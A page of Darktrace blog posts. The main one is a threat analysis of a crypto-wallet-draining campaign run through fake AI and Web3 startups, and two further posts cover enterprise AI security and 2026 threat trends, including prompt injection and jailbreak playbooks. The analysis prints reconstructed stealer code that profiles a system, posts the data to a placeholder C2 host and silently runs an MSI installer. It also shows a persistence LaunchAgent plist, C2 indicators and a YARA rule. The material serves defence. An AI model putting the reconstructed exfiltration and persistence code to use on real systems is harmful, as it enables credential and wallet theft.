July 10, 2025

Crypto Wallets Continue to be Drained in Elaborate Social Media Scam

Darktrace’s latest research reveals that an evolving social engineering campaign continues to target cryptocurrency users through fake startup companies. These malicious operations impersonate AI, gaming, and Web3 firms using spoofed social media accounts and project documentation hosted on legitimate platforms like Notion and GitHub.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Tara Gould
Threat Researcher

Overview

Continued research by Darktrace has revealed that cryptocurrency users are being targeted by threat actors in an elaborate social engineering scheme that continues to evolve. In December 2024, Cado Security Labs detailed the Meeten campaign, which targeted Web3 employees: threat actors set up fake meeting software companies to trick users into joining meetings and installing the information stealer Realst disguised as video meeting software.

The latest research from Darktrace shows that this campaign is still ongoing and continues to trick targets into downloading software that drains their crypto wallets. The campaign features:

  • Fake startup companies created by the threat actors, themed around AI, gaming, video meeting software, Web3 and social media.
  • Compromised X (formerly Twitter) accounts, typically verified, for both the companies and their employees, used to contact victims and create the facade of a legitimate company.
  • Notion, Medium and GitHub used to host whitepapers, project roadmaps and employee details.
  • Malware builds for both Windows and macOS.
  • Stolen software-signing certificates in the Windows versions for credibility and defense evasion.
  • Anti-analysis techniques, including obfuscation and anti-sandboxing.

To reach as many victims as possible, the threat actors make each company look as legitimate as they can. To achieve this, they use sites commonly associated with software companies, such as X, Medium, GitHub and Notion. Each company has a professional-looking website that includes employees, product blogs, whitepapers and roadmaps. X is used heavily both to contact victims and to increase the appearance of legitimacy. Some of the observed X accounts appear to be compromised accounts that are typically verified and have large follower and following counts, adding to the appearance of a real company.

Figure 1: Example of a compromised X account to create a “BuzzuAI” employee.

The threat actors remain active on these accounts for the duration of the campaign, posting about software developments and product marketing. One of the fake companies in this campaign, “Eternal Decay”, a supposed blockchain-powered game, has even posted doctored photos on social media pretending to present at conferences, although the game itself does not exist.

Figure 2: From the Eternal Decay X account, threat actors have altered a photo from an Italian exhibition (original on the right) to make it look like Eternal Decay was presented.

In addition to X, Medium is used to post blogs about the software, while Notion has been used across the campaigns to host product roadmap details and employee lists.

Figure 3: Notion project team page for Swox.

GitHub has been used to detail technical aspects of the software, with repositories containing stolen open-source projects renamed to make the code look unique. In the Eternal Decay example, GitBook is used to host company and software information. The threat actors even include company registration information from Companies House; however, the link points to an existing company with a similar name, and “Eternal Decay” is not itself a registered company.

Figure 4: From the Eternal Decay Gitbook linking to a company with a similar name on Companies House.
Figure 5: Gitbook for “Eternal Decay” listing investors.
Figure 6: Gameplay images are stolen from a different game “Zombie Within” and posted pretending to be Eternal Decay gameplay.

For some of the fake companies, fake merchandise stores have even been set up. Combined, these elements create the appearance of a legitimate start-up company, increasing the threat actors’ chances of infecting victims.

Each campaign typically starts with the victim being contacted via X, Telegram or Discord. A fake employee of the company contacts the victim, asking them to test the software in exchange for a cryptocurrency payment. The victim is directed to the company website’s download page, where they must enter a registration code, provided by the employee, to download a binary. Depending on their operating system, the victim is instructed to download either a macOS DMG (if available) or a Windows Electron application.

Figure 7: Example of threat actor messaging a victim on X with a registration code.

Windows Version

Similar to the aforementioned Meeten campaign, the Windows version distributed by the fake software companies is an Electron application. Electron is an open-source framework for running JavaScript applications as desktop applications. Once the user follows the directions sent to them via message, opening the application brings up a Cloudflare verification screen.

Figure 8: Cloudflare verification screen.
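
For context, an Electron application of this kind is ordinary JavaScript wrapped in desktop boilerplate. The minimal sketch below is illustrative only (not the actual malware source, and the file name is an assumption); it shows the shape of such an app’s main process, where the fake verification page is simply the window’s content.

// Minimal Electron main process, shown for context only.
const { app, BrowserWindow } = require('electron');

app.whenReady().then(() => {
  const win = new BrowserWindow({ width: 900, height: 600 });
  // Illustrative file name: here this would be the fake Cloudflare-style page.
  win.loadFile('index.html');
});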

The malware begins by profiling the system, gathering information like the username, CPU and core count, RAM, operating system, MAC address, graphics card, and UUID.

Figure 9: Code from the Electron app showing console output of system profiling.
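
The strings later matched by the YARA rule at the end of this post (for example os.cpus()[0].model and the details.mac check) indicate how this profiling is implemented. Below is a hedged reconstruction in Node.js; the object layout and field names are assumptions rather than code recovered from the sample.

// Hedged reconstruction of the profiling step; field names are assumptions.
const os = require('os');
const { execSync } = require('child_process');

function getMacAddress() {
  for (const iface of Object.values(os.networkInterfaces())) {
    for (const details of iface) {
      // Same non-zero MAC check referenced in the YARA rule below.
      if (details.mac && details.mac !== '00:00:00:00:00:00') return details.mac;
    }
  }
  return null;
}

const profile = {
  username: os.userInfo().username,
  cpu: os.cpus()[0].model,
  cores: os.cpus().length,
  ramGB: Math.round(os.totalmem() / (1024 ** 3)),
  platform: `${os.platform()} ${os.release()}`,
  mac: getMacAddress(),
  // Windows-specific lookups matching the Get-CimInstance/wmic strings in the YARA rule:
  uuid: execSync('powershell -Command "(Get-CimInstance Win32_ComputerSystemProduct).UUID"').toString().trim(),
  gpu: execSync('wmic path win32_VideoController get name').toString().split('\n')[1].trim(),
};

console.log(profile);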

A verification step follows: a captcha token is extracted from the app-launcher URL and sent to the server along with the system information and UUID. If verification succeeds, an executable or MSI file is downloaded and executed quietly. Python is also retrieved and stored in /AppData/Temp, with Python commands subsequently sent from the command-and-control (C2) infrastructure.

Figure 10: Code from the Electron app looping through Python objects.
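
A sketch of this verification-and-drop flow is below, again hedged: the endpoint and parameter names are assumptions, while the app-launcher:// scheme and the msiexec flags mirror the $url_token and $runExe patterns in the YARA rule at the end of this post.

// Hedged sketch of the verification flow; URL and field names are illustrative.
const { execFile } = require('child_process');

function extractToken(deepLink) {
  // e.g. app-launcher://verify?token=abc123
  return new URL(deepLink).searchParams.get('token');
}

async function verify(deepLink, profile) {
  // The captcha token is sent with the system profile; a success response
  // would point to an EXE/MSI payload to download and run quietly.
  const res = await fetch('https://example-c2.invalid/verify', { // placeholder host, not an IoC
    method: 'POST',
    headers: { 'content-type': 'application/json' },
    body: JSON.stringify({ token: extractToken(deepLink), ...profile }),
  });
  return res.json();
}

function runInstallerQuietly(msiPath) {
  // Matches the $runExe pattern: msiexec /i <file> /quiet /norestart
  execFile('msiexec', ['/i', msiPath, '/quiet', '/norestart'], () => {});
}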

As no valid token was available during analysis, this process did not succeed. However, based on previous campaigns and victim reports on social media, an information stealer targeting crypto wallets is executed at this stage. A common tactic in the observed campaigns is the use of stolen code-signing certificates to evade detection and increase the appearance of legitimate software. Certificates belonging to two legitimate companies, Jiangyin Fengyuan Electronics Co., Ltd. and Paperbucketmdb ApS (revoked as of June 2025), were used during this campaign.

macOS Version

For companies offering a macOS version of the malware, the user is directed to download a DMG. The DMG contains a bash script and a multi-architecture macOS binary. The bash script is obfuscated with junk code, base64 encoding and XOR.

Figure 11: Obfuscated Bash script.
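
When peeling back this kind of obfuscation, a small helper script is often enough. The sketch below is an analyst-side aid, not code from the sample, and assumes a single-byte XOR key applied after base64 decoding; real samples may chain layers differently. It brute-forces the key and flags plausible plaintext.

// Analyst helper: strip one base64 + single-byte-XOR layer from a blob.
// Assumption: a fixed one-byte key; real samples may add junk and extra layers.
const fs = require('fs');

const blob = fs.readFileSync(process.argv[2], 'utf8').replace(/\s+/g, '');
const raw = Buffer.from(blob, 'base64');

for (let key = 0; key < 256; key++) {
  const out = Buffer.alloc(raw.length);
  for (let i = 0; i < raw.length; i++) out[i] = raw[i] ^ key;
  const text = out.toString('utf8');
  // "osascript" is a useful marker given the AppleScript stage described next.
  if (text.includes('osascript')) {
    console.log(`key=0x${key.toString(16)}\n${text}`);
  }
}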

After decoding, the contents of the script reveal that AppleScript is being used. The script searches the disk drives for the mounted “SwoxApp” DMG, moves the hidden .SwoxApp binary to /tmp/ and makes it executable. This type of AppleScript is commonly used in macOS malware such as Atomic Stealer.

Figure 12: AppleScript used to mount the malware and make it executable.

The SwoxApp binary is the prominent macOS information stealer Atomic Stealer. Once executed, the malware performs anti-analysis checks for QEMU, VMware and Docker-OSX, exiting if any return true. The main functionality of Atomic Stealer is to steal data including browser data, crypto wallets, cookies and documents. This data is compressed into /tmp/out.zip and sent via POST request to 45[.]94[.]47[.]167/contact. An additional bash script is then retrieved from 77[.]73[.]129[.]18:80/install.sh.

Figure 13: Additional Bash script ”install.sh”.

Install.sh, as shown in Figure 13, retrieves another script, install_dynamic.sh, from the server https://mrajhhosdoahjsd[.]com. Install_dynamic.sh downloads and extracts InstallerHelper.app, then sets up persistence via a Launch Agent to run the app at login.

Figure 14: Persistence added via Plist configuration.

This plist configuration installs a macOS LaunchAgent that silently runs the app at user login. RunAtLoad and KeepAlive keys are used to ensure the app starts automatically and remains persistent.
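
A representative LaunchAgent plist of the kind shown in Figure 14 is below; the label and path are illustrative placeholders, not indicators from this campaign.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.example.installerhelper</string> <!-- illustrative label -->
    <key>ProgramArguments</key>
    <array>
        <string>/Users/user/Library/Application Support/InstallerHelper.app/Contents/MacOS/InstallerHelper</string>
    </array>
    <key>RunAtLoad</key> <!-- start at login -->
    <true/>
    <key>KeepAlive</key> <!-- relaunch if the process exits -->
    <true/>
</dict>
</plist>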

The retrieved binary, InstallerHelper, is an Objective-C/Swift binary that logs active application usage, window information and user interaction timestamps. This data is written to local log files, and the contents are periodically transmitted to https://mrajhhoshoahjsd[.]com/collect-metrics via scheduled network requests.

List of known companies

Darktrace has identified a number of the fake companies used in this scam. These can be found in the list below:

Pollens AI
X: @pollensapp, @Pollens_app
Website: pollens.app, pollens.io, pollens.tech
Windows: 02a5b35be82c59c55322d2800b0b8ccc
Notes: Posing as an AI software company with a focus on “collaborative creation”.

Buzzu
X: @BuzzuApp, @AI_Buzzu, @AppBuzzu
Website: Buzzu.app, Buzzu.us, buzzu.me, Buzzu.space
Windows: 7d70a7e5661f9593568c64938e06a11a
Mac: be0e3e1e9a3fda76a77e8c5743dd2ced
Notes: Same as Pollens, including the logo, but under a different name.

Cloudsign
X: @cloudsignapp
Windows: 3a3b13de4406d1ac13861018d74bf4b2
Notes: Claims to be a document signing platform.

Swox
X: @SwoxApp, @Swox_AI, @swox_app, @App_Swox, @AppSwox, @SwoxProject, @ProjectSwox
Website: swox.io, swox.app, swox.cc, swoxAI.com, swox.us
Windows: d50393ba7d63e92d23ec7d15716c7be6
Mac: 81996a20cfa56077a3bb69487cc58405ced79629d0c09c94fb21ba7e5f1a24c9
Notes: Claims to be a “Next gen social network in the WEB3”. Same GitHub code as Pollens.

KlastAI
X: Links to Pollens X account
Website: Links to pollens.tech
Notes: Same as Pollens; its GitHub readme page still shows Pollens branding.

Wasper
X: @wasperAI, @WasperSpace
Website: wasper.pro, wasper.app, wasper.org, wasper.space
Notes: Same logo and GitHub code as Pollens.

Lunelior
Website: lunelior.net, Lunelior.app, lunelior.io, lunelior.us
Windows: 74654e6e5f57a028ee70f015ef3a44a4
Mac: d723162f9197f7a548ca94802df74101

BeeSync
X: @BeeSyncAI, @AIBeeSync
Website: beesync.ai, beesync.cc
Notes: Previous alias of Buzzu, Git repo renamed January 2025.

Slax
X: @SlaxApp, @Slax_app, @slaxproject
Website: slax.tech, slax.cc, slax.social, slaxai.app

Solune
X: @soluneapp
Website: solune.io, solune.me
Windows: 22b2ea96be9d65006148ecbb6979eccc

Eternal Decay
X: @metaversedecay
Website: eternal-decay.xyz
Windows: 558889183097d9a991cb2c71b7da3c51
Mac: a4786af0c4ffc84ff193ff2ecbb564b8

Dexis
X: @DexisApp
Website: dexis.app
Notes: Same branding as Swox.

NexVoo
X: @Nexvoospace
Website: nexvoo.app, Nexvoo.net, Nexvoo.us

NexLoop
X: @nexloopspace
Website: nexloop.me

NexoraCore
Notes: Rename of the Nexloop Git repo.

YondaAI
X: @yondaspace
Website: yonda.us

Traffer Groups

A “traffer” malware group is an organized cybercriminal operation that specializes in directing internet users to malicious content, typically information-stealing malware, through compromised or deceptive websites, ads and links. These groups tend to operate in teams with hierarchical structures: administrators recruit “traffers” (affiliates) to generate traffic and malware installs via search engine optimization (SEO), YouTube ads, fake software downloads or owned sites, then monetize the stolen credentials and data via dedicated marketplaces.

A prominent traffer group, “CrazyEvil”, was identified by Recorded Future in early 2025. The group, active since at least 2021, specializes in social engineering attacks targeting cryptocurrency users, influencers, DeFi professionals and gaming communities. As reported by Recorded Future, CrazyEvil is estimated to have made millions of dollars in revenue from its malicious activity. CrazyEvil and its sub-teams create fake software companies, similar to those described in this blog, making use of X and Medium to target victims. As seen in this campaign, CrazyEvil instructs users to download software that is in fact an information stealer targeting both macOS and Windows users.

While it is unclear whether the campaigns described in this blog can be attributed to CrazyEvil or any of its sub-teams, the techniques are similar in nature. This campaign highlights the lengths threat actors will go to in order to make fake companies look legitimate and steal cryptocurrency from victims, as well as their use of newer, more evasive versions of malware.

Indicators of Compromise (IoCs)

  • Manboon[.]com
  • https://gaetanorealty[.]com
  • Troveur[.]com
  • Bigpinellas[.]com
  • Dsandbox[.]com
  • Conceptwo[.]com
  • Aceartist[.]com
  • turismoelcasco[.]com
  • Ekodirect[.]com
  • https://mrajhhosdoahjsd[.]com
  • https://isnimitz.com/zxc/app[.]zip
  • http://45[.]94[.]47[.]112/contact
  • 45[.]94[.]47[.]167/contact
  • 77[.]73[.]129[.]18:80

Domain Keys associated with the C2s

YARA Rules

rule Suspicious_Electron_App_Installer
{
    meta:
        description = "Detects Electron apps collecting HWID, MAC, GPU info and executing remote EXEs/MSIs"
        date = "2025-06-18"

    strings:
        $electron_require = /require\(['"]electron['"]\)/
        $axios_require = /require\(['"]axios['"]\)/
        $exec_use = /exec\(.*?\)/
        $url_token = /app-launcher:\/\/.*token=/
        $getHWID = /(Get-CimInstance Win32_ComputerSystemProduct).UUID/
        $getMAC = /details\.mac && details\.mac !== '00:00:00:00:00:00'/
        $getGPU = /wmic path win32_VideoController get name/
        $getInstallDate = /InstallDate/
        $os_info = /os\.cpus\(\)\[0\]\.model/
        $downloadExe = /\.exe['"]/
        $runExe = /msiexec \/i.*\/quiet \/norestart/
        $zipExtraction = /AdmZip\(.*\.extractAllTo/

    condition:
        (all of ($electron_require, $axios_require, $exec_use) and
         3 of ($getHWID, $getMAC, $getGPU, $getInstallDate, $os_info) and
         2 of ($downloadExe, $runExe, $zipExtraction, $url_token))
}
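
As a hunting aid, this rule can be run over unpacked Electron application resources (for example, extracted app.asar contents) with the standard YARA CLI, such as yara -r Suspicious_Electron_App_Installer.yar <unpacked_app_dir>. Given how generic several of the strings are, matches are best treated as triage leads rather than high-confidence detections.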




December 23, 2025

How to Secure AI in the Enterprise: A Practical Framework for Models, Data, and Agents


Introduction: Why securing AI is now a security priority

AI adoption is at the forefront of digital transformation in businesses, outpacing the rate at which IT and security professionals can establish governance models and security parameters. Adopting generative AI chatbots, autonomous agents, and AI-enabled SaaS tools promises efficiency and speed, but it also introduces new forms of risk that traditional security controls were never designed to manage. For many organizations, the first challenge is not whether AI should be secured, but what “securing AI” actually means in practice. Is it about protecting models? Governing data? Monitoring outputs? Or controlling how AI agents behave once deployed?

While demand for adoption increases, securing AI use in the enterprise remains an abstract concept to many, and operationalizing it goes far beyond simply having visibility. Practitioners also need to consider how AI is sourced, built, deployed, used, and governed across the enterprise.

The goal for security teams: implement a clear, lifecycle-based AI security framework. This blog demonstrates the variety of AI use cases that should be considered when developing such a framework, and how to frame the conversation for non-technical audiences.

What does “securing AI” actually mean?

Securing AI is often framed as an extension of existing security disciplines. In practice, this assumption can cause confusion.

Traditional security functions are built around relatively stable boundaries. Application security focuses on code and logic. Cloud security governs infrastructure and identity. Data security protects sensitive information at rest and in motion. Identity security controls who can access systems and services. Each function has clear ownership, established tooling, and well-understood failure modes.

AI does not fit neatly into any of these categories. An AI system is simultaneously:

  • An application that executes logic
  • A data processor that ingests and generates sensitive information
  • A decision-making layer that influences or automates actions
  • A dynamic system that changes behavior over time

As a result, the security risks introduced by AI cut across multiple domains at once. A single AI interaction can involve identity misuse, data exposure, application logic abuse, and supply chain risk, all within the same workflow. This is where the traditional lines between security functions begin to blur.

For example, a malicious prompt submitted by an authorized user is not a classic identity breach, yet it can trigger data leakage or unauthorized actions. An AI agent calling an external service may appear as legitimate application behavior, even as it violates data sovereignty or compliance requirements. AI-generated code may pass standard development checks while introducing subtle vulnerabilities or compromised dependencies.

In each case, no single security team “owns” the risk outright.

This is why securing AI cannot be reduced to model safety, governance policies, or perimeter controls alone. It requires a shared security lens that spans development, operations, data handling, and user interaction. Securing AI means understanding not just whether systems are accessed securely, but whether they are being used, trained, and allowed to act in ways that align with business intent and risk tolerance.

At its core, securing AI is about restoring clarity in environments where accountability can quickly blur. It is about knowing where AI exists, how it behaves, what it is allowed to do, and how its decisions affect the wider enterprise. Without this clarity, AI becomes a force multiplier for both productivity and risk.

The five categories of AI risk in the enterprise

A practical way to approach AI security is to organize risk around how AI is used and where it operates. The framework below defines five categories of AI risk, each aligned to a distinct layer of the enterprise AI ecosystem.

How to Secure AI in the Enterprise:

  • Defending against misuse and emergent behaviors
  • Monitoring and controlling AI in operation
  • Protecting AI development and infrastructure
  • Securing the AI supply chain
  • Strengthening readiness and oversight

Together, these categories provide a structured lens for understanding how AI risk manifests and where security teams should focus their efforts.

1. Defending against misuse and emergent AI behaviors

Generative AI systems and agents can be manipulated in ways that bypass traditional controls. Even when access is authorized, AI can be misused, repurposed, or influenced through carefully crafted prompts and interactions.

Key risks include:

  • Malicious prompt injection designed to coerce unwanted actions
  • Unauthorized or unintended use cases that bypass guardrails
  • Exposure of sensitive data through prompt histories
  • Hallucinated or malicious outputs that influence human behavior

Unlike traditional applications, AI systems can produce harmful outcomes without being explicitly compromised. Securing this layer requires monitoring intent, not just access. Security teams need visibility into how AI systems are being prompted, how outputs are consumed, and whether usage aligns with approved business purposes.

2. Monitoring and controlling AI in operation

Once deployed, AI agents operate at machine speed and scale. They can initiate actions, exchange data, and interact with other systems with little human oversight. This makes runtime visibility critical.

Operational AI risks include:

  • Agents using permissions in unintended ways
  • Uncontrolled outbound connections to external services or agents
  • Loss of forensic visibility into ephemeral AI components
  • Non-compliant data transmission across jurisdictions

Securing AI in operation requires real-time monitoring of agent behavior, centralized control points such as AI gateways, and the ability to capture agent state for investigation. Without these capabilities, security teams may be blind to how AI systems behave once live, particularly in cloud-native or regulated environments.

3. Protecting AI development and infrastructure

Many AI risks are introduced long before deployment. Development pipelines, infrastructure configurations, and architectural decisions all influence the security posture of AI systems.

Common risks include:

  • Misconfigured permissions and guardrails
  • Insecure or overly complex agent architectures
  • Infrastructure-as-Code introducing silent misconfigurations
  • Vulnerabilities in AI-generated code and dependencies

AI-generated code adds a new dimension of risk, as hallucinated packages or insecure logic may be harder to detect and debug than human-written code. Securing AI development means applying security controls early, including static analysis, architectural review, and continuous configuration monitoring throughout the build process.

4. Securing the AI supply chain

AI supply chains are often opaque. Models, datasets, dependencies, and services may come from third parties with varying levels of transparency and assurance.

Key supply chain risks include:

  • Shadow AI tools used outside approved controls
  • External AI agents granted internal access
  • Suppliers applying AI to enterprise data without disclosure
  • Compromised models, training data, or dependencies

Securing the AI supply chain requires discovering where AI is used, validating the provenance and licensing of models and data, and assessing how suppliers process and protect enterprise information. Without this visibility, organizations risk data leakage, regulatory exposure, and downstream compromise through trusted integrations.

5. Strengthening readiness and oversight

Even with strong technical controls, AI security fails without governance, testing, and trained teams. AI introduces new incident scenarios that many security teams are not yet prepared to handle.

Oversight risks include:

  • Lack of meaningful AI risk reporting
  • Untested AI systems in production
  • Security teams untrained in AI-specific threats

Organizations need AI-aware reporting, red and purple team exercises that include AI systems, and ongoing training to build operational readiness. These capabilities ensure AI risks are understood, tested, and continuously improved, rather than discovered during a live incident.

Reframing AI security for the boardroom

AI security is not just a technical issue. It is a trust, accountability, and resilience issue. Boards want assurance that AI-driven decisions are reliable, explainable, and protected from tampering.

Effective communication with leadership focuses on:

  • Trust: confidence in data integrity, model behavior, and outputs
  • Accountability: clear ownership across teams and suppliers
  • Resilience: the ability to operate, audit, and adapt under attack or regulation

Mapping AI security efforts to recognized frameworks such as ISO/IEC 42001 and the NIST AI Risk Management Framework helps demonstrate maturity and aligns AI security with broader governance objectives.

Conclusion: Securing AI is a lifecycle challenge

The same characteristics that make AI transformative also make it difficult to secure. AI systems blur traditional boundaries between software, users, and decision-making, expanding the attack surface in subtle but significant ways.

Securing AI requires restoring clarity. Knowing where AI exists, how it behaves, who controls it, and how it is governed. A framework-based approach allows organizations to innovate with AI while maintaining trust, accountability, and control.

The journey to secure AI is ongoing, but it begins with understanding the risks across the full AI lifecycle and building security practices that evolve alongside the technology.

About the author
Brittany Woodsmall
Product Marketing Manager, AI & Attack Surface


December 22, 2025

The Year Ahead: AI Cybersecurity Trends to Watch in 2026


Introduction: 2026 cyber trends

Each year, we ask some of our experts to step back from the day-to-day pace of incidents, vulnerabilities, and headlines to reflect on the forces reshaping the threat landscape. The goal is simple:  to identify and share the trends we believe will matter most in the year ahead, based on the real-world challenges our customers are facing, the technology and issues our R&D teams are exploring, and our observations of how both attackers and defenders are adapting.  

In 2025, we saw generative AI and early agentic systems moving from limited pilots into more widespread adoption across enterprises. Generative AI tools became embedded in SaaS products and enterprise workflows we rely on every day, AI agents gained more access to data and systems, and we saw glimpses of how threat actors can manipulate commercial AI models for attacks. At the same time, expanding cloud and SaaS ecosystems and the increasing use of automation continued to stretch traditional security assumptions.

Looking ahead to 2026, we’re already seeing the security of AI models, agents, and the identities that power them become a key point of tension, and of opportunity, for both attackers and defenders. Long-standing challenges such as identity, trust, data integrity, and human decision-making will not disappear, but AI and automation will increase the speed and scale of cyber risk.

Here's what a few of our experts believe are the trends that will shape this next phase of cybersecurity, and the realities organizations should prepare for.  

Agentic AI is the next big insider risk

In 2026, organizations may experience their first large-scale security incidents driven by agentic AI behaving in unintended ways—not necessarily due to malicious intent, but because of how easily agents can be influenced. AI agents are designed to be helpful, lack judgment, and operate without understanding context or consequence. This makes them highly efficient—and highly pliable. Unlike human insiders, agentic systems do not need to be socially engineered, coerced, or bribed. They only need to be prompted creatively, misinterpret legitimate prompts, or be vulnerable to indirect prompt injection. Without strong controls around access, scope, and behavior, agents may over-share data, misroute communications, or take actions that introduce real business risk. Securing AI adoption will increasingly depend on treating agents as first-class identities—monitored, constrained, and evaluated based on behavior, not intent.

-- Nicole Carignan, SVP of Security & AI Strategy

Prompt Injection moves from theory to front-page breach

We’ll see the first major story of an indirect prompt injection attack against a company adopting AI, whether through a publicly accessible chatbot or an agentic system ingesting a hidden prompt. In practice, this may result in unauthorized data exposure or unintended malicious behavior by AI systems, such as over-sharing information, misrouting communications, or acting outside their intended scope. Recent attention on this risk, particularly in the context of AI-powered browsers and the additional safety layers being introduced to guide agent behavior, highlights a growing industry awareness of the challenge.

-- Collin Chapleau, Senior Director of Security & AI Strategy

Humans are even more outpaced, but not broken

When it comes to cyber, people aren’t failing; the system is moving faster than they can. Attackers exploit the gap between human judgment and machine-speed operations. The rise of deepfakes and emotion-driven scams over the last few years reduces our ability to spot the familiar human cues we’ve been taught to look out for. Fraud now spans social platforms, encrypted chat, and instant payments in minutes. Expecting humans to be the last line of defense is unrealistic.

Defense must assume human fallibility and design accordingly. Automated provenance checks, cryptographic signatures, and dual-channel verification should precede human judgment. Training still matters, but it cannot close the gap alone. In the year ahead, we need to see more of a focus on partnership: systems that absorb risk so humans make decisions in context, not under pressure.

-- Margaret Cunningham, VP of Security & AI Strategy

AI removes the attacker bottleneck—smaller organizations feel the impact

One factor that is currently preventing more companies from breaches is a bottleneck on the attacker side: there’s not enough human hacker capital. The number of human hands on a keyboard is a rate-determining factor in the threat landscape. Further advancements of AI and automation will continue to open that bottleneck. We are already seeing that. The ostrich approach of hoping that one’s own company is too obscure to be noticed by attackers will no longer work as attacker capacity increases.  

-- Max Heinemeyer, Global Field CISO

SaaS platforms become the preferred supply chain target

Attackers have learned a simple lesson: compromising SaaS platforms can have big payouts. As a result, we’ll see more targeting of commercial off-the-shelf SaaS providers, which are often highly trusted and deeply integrated into business environments. Some of these attacks may involve software with unfamiliar brand names, but their downstream impact will be significant. In 2026, expect more breaches where attackers leverage valid credentials, APIs, or misconfigurations to bypass traditional defenses entirely.

-- Nathaniel Jones, VP of Security & AI Strategy

Increased commercialization of generative AI and AI assistants in cyber attacks

One trend we’re watching closely for 2026 is the commercialization of AI-assisted cybercrime. For example, cybercrime prompt playbooks sold on the dark web—essentially copy-and-paste frameworks that show attackers how to misuse or jailbreak AI models. It’s an evolution of what we saw in 2025, where AI lowered the barrier to entry. In 2026, those techniques become productized, scalable, and much easier to reuse.  

-- Toby Lewis, Global Head of Threat Analysis

Conclusion

Taken together, these trends underscore that the core challenges of cybersecurity are not changing dramatically -- identity, trust, data, and human decision-making still sit at the core of most incidents. What is changing quickly is the environment in which these challenges play out. AI and automation are accelerating everything: how quickly attackers can scale, how widely risk is distributed, and how easily unintended behavior can create real impact. And as technologies like cloud services and SaaS platforms become even more deeply integrated into businesses, the potential attack surface continues to expand.

Predictions are not guarantees. But the patterns emerging today suggest that 2026 will be a year where securing AI becomes inseparable from securing the business itself. The organizations that prepare now—by understanding how AI is used, how it behaves, and how it can be misused—will be best positioned to adopt these technologies with confidence in the year ahead.

Learn more about how to secure AI adoption in the enterprise without compromise by registering to join our live launch webinar on February 3, 2026.  

About the author
The Darktrace Community